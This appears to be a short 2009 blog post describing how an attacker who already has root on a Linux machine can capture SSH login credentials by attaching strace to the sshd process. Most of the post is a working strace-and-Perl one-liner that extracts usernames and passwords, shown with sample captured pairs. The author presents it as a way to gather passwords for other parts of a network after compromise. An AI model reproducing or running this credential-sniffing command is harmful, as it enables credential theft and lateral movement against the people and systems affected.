Sunday, 13 December 2009

SSHD password sniffing

I remember reading something a while back where someone had a linux honeypot running a modified SSH daemon. This custom SSH daemon would log both the usernames and passwords of attempted connections. This is very interesting from a research point of view, as it gives you an idea as to what kind of password dictionaries are being used.

However, grabbing SSH passwords can also be useful if people tend to accidentally type the wrong password from time to time. You might have gained root on a particular box. By watching the SSH attempts it might be possible to gather additional valid passwords for other parts of the network - just because people accidentally type the wrong one in.

It isn't even necessary to install a new SSH daemon binary. If you already have root, you can just strace the process (assuming of course that strace is installed):

# strace -f -p $(pgrep -o sshd) 2>&1 | perl -ne 'BEGIN { $o=""; } { chomp; if ($_ =~ /getpeername/) { if ($o =~ /read\(\d+, \"\\[0-9a-z]\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]([^\"]+)\"/) { $u = $1; print "$u, "; } } if ($_ =~ /getuid\(\)/) { if ($o =~ /read\(\d+, \"\\v\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]([^\"]+)\"/) { $p = $1; print "$p\n"; }; } $o=$_;}'
cats, anddogs
root, r00t
admin, test
mysql, mysql

Now, the above script doesn't work for all variations of usernames/passwords. It needs some refining... but you get the general idea.

No comments:

Post a Comment